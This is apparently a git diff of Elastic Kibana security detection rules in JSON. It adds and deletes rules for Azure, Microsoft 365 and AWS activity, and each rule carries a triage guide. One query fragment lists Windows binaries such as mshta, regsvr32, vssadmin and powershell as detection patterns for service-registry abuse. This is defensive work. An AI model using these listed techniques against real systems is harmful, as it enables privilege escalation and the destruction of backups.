\"*\\\\ieexec.exe\",\n \"*\\\\iexpress.exe\",\n \"*\\\\installutil.exe\",\n \"*\\\\Microsoft.Workflow.Compiler.exe\",\n \"*\\\\msbuild.exe\",\n \"*\\\\mshta.exe\",\n \"*\\\\msiexec.exe\",\n \"*\\\\msxsl.exe\",\n \"*\\\\net.exe\",\n \"*\\\\powershell.exe\",\n \"*\\\\pwsh.exe\",\n \"*\\\\reg.exe\",\n \"*\\\\RegAsm.exe\",\n \"*\\\\RegSvcs.exe\",\n \"*\\\\regsvr32.exe\",\n \"*\\\\rundll32.exe\",\n \"*\\\\vssadmin.exe\",\n \"*\\\\wbadmin.exe\",\n \"*\\\\wmic.exe\",\n \"*\\\\wscript.exe\"\n )\n )\n", + "references": [ + "https://cube0x0.github.io/Pocing-Beyond-DA/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.key", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.011", + "name": "Services Registry Permissions Weakness", + "reference": "https://attack.mitre.org/techniques/T1574/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_104.json b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_104.json deleted file mode 100644 index 685b36038c6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_104.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application.", - "false_positives": [ - "Authorization rule additions or modifications may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Authorization rule additions or modifications from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Event Hub Authorization Rule Created or Updated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Event Hub Authorization Rule Created or Updated\n\nAzure Event Hub Authorization Rules manage access to Event Hubs via cryptographic keys, akin to administrative credentials. Adversaries may exploit these rules to gain unauthorized access or escalate privileges, potentially exfiltrating data. The detection rule monitors for the creation or modification of these rules, flagging successful operations to identify potential misuse or unauthorized changes.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal associated with the operation by examining the `azure.activitylogs.operation_name` and `event.outcome` fields.\n- Check the timestamp of the event to determine when the authorization rule was created or updated, and correlate this with any other suspicious activities around the same time.\n- Investigate the specific Event Hub namespace affected by the rule change to understand its role and importance within the organization.\n- Verify if the `RootManageSharedAccessKey` or any other high-privilege authorization rule was involved, as these carry significant risk if misused.\n- Assess the necessity and legitimacy of the rule change by contacting the user or team responsible for the Event Hub namespace to confirm if the change was authorized and aligns with operational needs.\n- Examine any subsequent access patterns or data transfers from the affected Event Hub to detect potential data exfiltration or misuse following the rule change.\n\n### False positive analysis\n\n- Routine administrative updates to authorization rules by IT staff can trigger alerts. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Automated scripts or deployment tools that update authorization rules as part of regular operations may cause false positives. Identify these scripts and exclude their activity from alerts by filtering based on their service principal or user identity.\n- Changes made by trusted third-party services integrated with Azure Event Hub might be flagged. Verify these services and exclude their operations by adding them to an allowlist.\n- Frequent updates during development or testing phases can lead to false positives. Consider setting up separate monitoring profiles for development environments to reduce noise.\n- Legitimate changes made by users with appropriate permissions might be misinterpreted as threats. Regularly review and update the list of authorized users to ensure only necessary personnel have access, and exclude their actions from alerts.\n\n### Response and remediation\n\n- Immediately revoke or rotate the cryptographic keys associated with the affected Event Hub Authorization Rule to prevent unauthorized access.\n- Review the Azure Activity Logs to identify any unauthorized access or data exfiltration attempts that may have occurred using the compromised authorization rule.\n- Implement conditional access policies to restrict access to Event Hub Authorization Rules based on user roles and network locations.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been compromised.\n- Conduct a security review of all Event Hub Authorization Rules to ensure that only necessary permissions are granted and that the RootManageSharedAccessKey is not used in applications.\n- Enhance monitoring and alerting for changes to authorization rules by integrating with a Security Information and Event Management (SIEM) system to detect similar threats in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/event-hubs/authorize-access-shared-access-signature" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b6dce542-2b75-4ffb-b7d6-38787298ba9d", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Collection", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [ - { - "id": "T1537", - "name": "Transfer Data to Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1537/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 104 - }, - "id": "b6dce542-2b75-4ffb-b7d6-38787298ba9d_104", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1.json new file mode 100644 index 00000000000..49ba7487b1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1.json @@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the deletion of Azure Recovery Services resources. Azure Recovery Services vaults contain data for copies of VMs, workloads, servers, and other resources regarding Infrastructure as a Service (IaaS). Adversaries may delete these recovery services to impact backup capabilities during stable operations or to inhibit disaster recovery services during ransom-based attacks or operational disruptions.", + "from": "now-9m", + "index": [ + "logs-azure.activitylogs-*", + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Recovery Services Resource Deleted", + "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:MICROSOFT.RECOVERYSERVICES/*/DELETE and\n event.outcome:(Success or success)\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103.json b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103.json deleted file mode 100644 index 3b66502dfde..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103.json +++ /dev/null @@ -1,103 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data.", - "false_positives": [ - "Deletion of a resource group may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Resource group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Resource Group Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Resource Group Deletion\n\nAzure Resource Groups are containers that hold related resources for an Azure solution, enabling efficient management and organization. Adversaries may exploit this by deleting entire groups to disrupt services or erase data, causing significant impact. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential malicious actions for further investigation.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking for the operation name \"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE\" and ensure the event outcome is marked as \"Success\" or \"success\".\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Check the timestamp of the deletion event to determine when the resource group was deleted and correlate this with any other suspicious activities around the same time.\n- Investigate the resources contained within the deleted resource group to assess the potential impact, including any critical services or data that may have been affected.\n- Review any recent changes in permissions or roles assigned to the user or service principal involved in the deletion to identify potential privilege escalation or misuse.\n- Examine any related alerts or logs for unusual activities or patterns that might indicate a broader attack or compromise within the Azure environment.\n\n### False positive analysis\n\n- Routine maintenance activities by IT teams may trigger alerts when resource groups are intentionally deleted as part of regular updates or infrastructure changes. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scripts or deployment tools that manage resource lifecycles might delete resource groups as part of their normal operation. Identify these scripts and exclude their activity from alerts by filtering based on the service principal or automation account used.\n- Testing environments often involve frequent creation and deletion of resource groups. Exclude these environments from alerts by tagging them appropriately and configuring the detection rule to ignore actions on tagged resources.\n- Mergers or organizational restructuring can lead to legitimate resource group deletions. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring rules to prevent false positives.\n- Ensure that any third-party services or consultants with access to your Azure environment are accounted for, as their activities might include resource group deletions. Establish clear communication channels to verify their actions and adjust monitoring rules accordingly.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure subscription to prevent further unauthorized actions. This can be done by temporarily disabling access or applying strict access controls.\n- Review and revoke any suspicious or unauthorized access permissions associated with the affected resource group to prevent further exploitation.\n- Restore the deleted resources from backups if available. Ensure that backup and recovery processes are validated and functioning correctly.\n- Conduct a thorough audit of recent Azure activity logs to identify any other potentially malicious actions or compromised accounts.\n- Escalate the incident to the security operations team for a detailed investigation and to determine if there are broader implications or related threats.\n- Implement additional monitoring and alerting for similar deletion activities across all Azure subscriptions to enhance early detection of such threats.\n- Review and strengthen access management policies, ensuring that only authorized personnel have the necessary permissions to delete resource groups.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "bb4fe8d2-7ae2-475c-8b5d-55b449e4264f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207.json deleted file mode 100644 index 99c83d34642..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "OneDrive Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating OneDrive Malware File Upload\n\nOneDrive, a cloud storage service, facilitates file sharing and collaboration within organizations. However, adversaries can exploit this by uploading malware, which can spread across shared environments, leading to lateral movement within a network. The detection rule identifies such threats by monitoring OneDrive activities for malware detection events, focusing on file operations flagged by Microsoft's security engine. This proactive approach helps in identifying and mitigating potential breaches.\n\n### Possible investigation steps\n\n- Review the alert details to confirm the event dataset is 'o365.audit' and the event provider is 'OneDrive' to ensure the alert is relevant to OneDrive activities.\n- Examine the specific file operation flagged by the event code 'SharePointFileOperation' and action 'FileMalwareDetected' to identify the file in question and understand the nature of the detected malware.\n- Identify the user account associated with the file upload to determine if the account has been compromised or if the user inadvertently uploaded the malicious file.\n- Check the sharing settings of the affected file to assess the extent of exposure and identify any other users or systems that may have accessed the file.\n- Investigate the file's origin and history within the organization to trace how it was introduced into the environment and whether it has been shared or accessed by other users.\n- Review any additional security alerts or logs related to the user account or file to identify potential patterns of malicious activity or further compromise.\n- Coordinate with IT and security teams to isolate the affected file and user account, and initiate remediation steps to prevent further spread of the malware.\n\n### False positive analysis\n\n- Legitimate software updates or patches may be flagged as malware if they are not yet recognized by the security engine. Users should verify the source and integrity of the file and consider adding it to an exception list if confirmed safe.\n- Files containing scripts or macros used for automation within the organization might trigger false positives. Review the file's purpose and origin, and whitelist it if it is a known and trusted internal tool.\n- Shared files from trusted partners or vendors could be mistakenly identified as threats. Establish a process to verify these files with the sender and use exceptions for recurring, verified files.\n- Archived or compressed files that contain known safe content might be flagged due to their format. Decompress and scan the contents separately to confirm their safety before adding exceptions.\n- Files with unusual or encrypted content used for legitimate business purposes may be misclassified. Ensure these files are documented and approved by IT security before excluding them from alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected OneDrive account to prevent further file sharing and potential spread of malware within the organization.\n- Notify the user associated with the account about the detected malware and instruct them to cease any file sharing activities until further notice.\n- Conduct a thorough scan of the affected files using an updated antivirus or endpoint detection and response (EDR) solution to confirm the presence of malware and identify any additional infected files.\n- Remove or quarantine the identified malicious files from OneDrive and any other locations they may have been shared to prevent further access or execution.\n- Review and revoke any shared links or permissions associated with the infected files to ensure no unauthorized access is possible.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if any lateral movement or additional compromise has occurred.\n- Implement enhanced monitoring and alerting for similar OneDrive activities to quickly detect and respond to any future malware uploads or related threats.", - "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_208.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_208.json deleted file mode 100644 index c6f857db24b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_208.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", - "false_positives": [ - "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Teams Custom Application Interaction Allowed", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Teams Custom Application Interaction Allowed\n\nMicrosoft Teams allows organizations to enhance functionality by integrating custom applications, which can be developed and uploaded beyond the standard app store offerings. While beneficial for tailored solutions, this capability can be exploited by adversaries to maintain unauthorized access. The detection rule monitors changes in tenant settings that permit custom app interactions, flagging successful modifications as potential persistence threats.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action: TeamsTenantSettingChanged to identify when the change was made and by whom.\n- Verify the identity of the user or account associated with the event to determine if the change was authorized or if the account may have been compromised.\n- Check the o365.audit.Name field for \"Allow sideloading and interaction of custom apps\" to confirm that the alert corresponds to enabling custom app interactions.\n- Investigate the o365.audit.NewValue field to ensure it is set to True, indicating that the setting was indeed changed to allow custom apps.\n- Assess the event.outcome field to confirm the change was successful and not a failed attempt, which could indicate a different type of issue.\n- Examine any recent custom applications uploaded to Microsoft Teams to ensure they are legitimate and not potentially malicious.\n- Cross-reference with other security alerts or logs to identify any unusual activity around the time of the setting change that might suggest malicious intent.\n\n### False positive analysis\n\n- Routine administrative changes to Microsoft Teams settings can trigger this rule. If a known and authorized administrator frequently updates tenant settings to allow custom apps, consider creating an exception for their user account to reduce noise.\n- Organizations that regularly develop and deploy custom applications for internal use may see frequent alerts. In such cases, establish a process to document and approve these changes, and use this documentation to create exceptions for specific application deployment activities.\n- Scheduled updates or maintenance activities that involve enabling custom app interactions might be misidentified as threats. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring rules to prevent false positives during these periods.\n- If a third-party service provider is authorized to manage Teams settings, their actions might trigger alerts. Verify their activities and, if consistent and legitimate, add their actions to an exception list to prevent unnecessary alerts.\n- Changes made during a known testing or development phase can be mistaken for unauthorized access. Clearly define and communicate these phases to the security team, and consider temporary rule adjustments to accommodate expected changes.\n\n### Response and remediation\n\n- Immediately disable the custom application interaction setting in Microsoft Teams to prevent further unauthorized access or persistence by adversaries.\n- Conduct a thorough review of all custom applications currently uploaded to Microsoft Teams to identify any unauthorized or suspicious applications. Remove any that are not recognized or approved by the organization.\n- Analyze the audit logs for any recent changes to the Teams settings and identify the user account responsible for enabling custom application interactions. Investigate the account for signs of compromise or misuse.\n- Reset the credentials and enforce multi-factor authentication for the account(s) involved in the unauthorized change to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident and the actions taken. Escalate to higher management if the breach is suspected to have wider implications.\n- Implement additional monitoring and alerting for changes to Microsoft Teams settings to quickly detect and respond to similar threats in the future.\n- Review and update the organization's security policies and procedures regarding the use of custom applications in Microsoft Teams to ensure they align with best practices and mitigate the risk of similar incidents.", - "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Name", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.NewValue", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "bbd1a775-8267-41fa-9232-20e5582596ac_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212.json new file mode 100644 index 00000000000..983a87cd95b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to login to AWS as the root user without using multi-factor authentication (MFA). Amazon AWS best practices indicate that the root user should be protected by MFA.", + "false_positives": [ + "Some organizations allow login with the root user without MFA, however, this is not considered best practice by AWS and increases the risk of compromised credentials." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Deprecated - AWS Root Login Without MFA", + "note": "## Triage and analysis\n\n### Investigating Deprecated - AWS Root Login Without MFA\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your user name and password. With MFA enabled, when a user signs in to an AWS Management Console, they will be prompted for their user name and password, as well as for an authentication code from their AWS MFA device. Taken together, these multiple factors provide increased security for your AWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThe AWS root account is the one identity that has complete access to all AWS services and resources in the account, which is created when the AWS account is created. AWS strongly recommends that you do not use the root user for your everyday tasks, even the administrative ones. Instead, adhere to the best practice of using the root user only to create your first IAM user. Then securely lock away the root user credentials and use them to perform only a few account and service management tasks. Amazon provides a [list of the tasks that require root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule looks for attempts to log in to AWS as the root user without using multi-factor authentication (MFA), meaning the account is not secured properly.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Examine whether this activity is common in the environment by looking for past occurrences on your logs.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user?\n- Examine the commands, API calls, and data management actions performed by the account in the last 24 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking access to servers,\nservices, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity is not inherently malicious, the root account must use MFA. The security team should address any potential benign true positive (B-TP), as this configuration can risk the entire cloud environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Identify the services or servers involved criticality.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify if there are any regulatory or legal ramifications related to this activity.\n- Configure multi-factor authentication for the user.\n- 